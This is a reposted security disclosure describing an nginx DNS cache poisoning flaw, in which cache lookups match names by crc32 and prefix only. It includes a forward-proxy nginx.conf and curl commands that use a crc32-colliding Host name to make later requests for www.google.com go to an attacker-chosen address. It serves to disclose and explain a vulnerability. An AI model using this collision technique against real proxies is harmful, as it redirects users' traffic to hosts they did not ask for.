本文共 1494 字,大约阅读时间需要 4 分钟。
nginx maintains an internal DNS cache for resolved domain names.
However, when searching the cache, nginx only checks that the crc32 ofthe names match and that the shorter name is a prefix of the longername. It does not check that the names are equal in length.One way to exploit this is if nginx is configured as a forward proxy.This is an atypical use case, but it has been discussed on the nginxmailing list before[1].For example, using this nginx.conf:events { worker_connections 1024;}http { resolver 4.2.2.4;server { listen 8080;location / { proxy_pass http://$http_host$request_uri;}}}You can then run curl to see the cache poisoning in effect:$ curl -H 'Host: www.google.com.9nyz309.crc32.dempsky.org'http://127.0.0.1:8080/<html><body>Ho hum, nothing to see here, move along please.</body></html>$ curl -H 'Host: www.google.com' http://127.0.0.1:8080/<html><body>Oops, you shouldn't be asking me for http://www.google.com/!</body></html>(Restart nginx and run only the second command to see its expectedbehavior; i.e., actually fetching http://www.google.com/.)This works because crc32("www.google.com.") ==crc32("www.google.com.9nyz309.crc32.dempsky.org."). The first requestcached the IP address for www.google.com.9nyz309.crc32.dempsky.org,and then the second request used this IP address instead of queryingfor www.google.com's real IP address because of the matching CRCs andthe common prefix.[1] http://marc.info/?l=nginx&m=125257590425747&w=2转载地址:http://qemmb.baihongyu.com/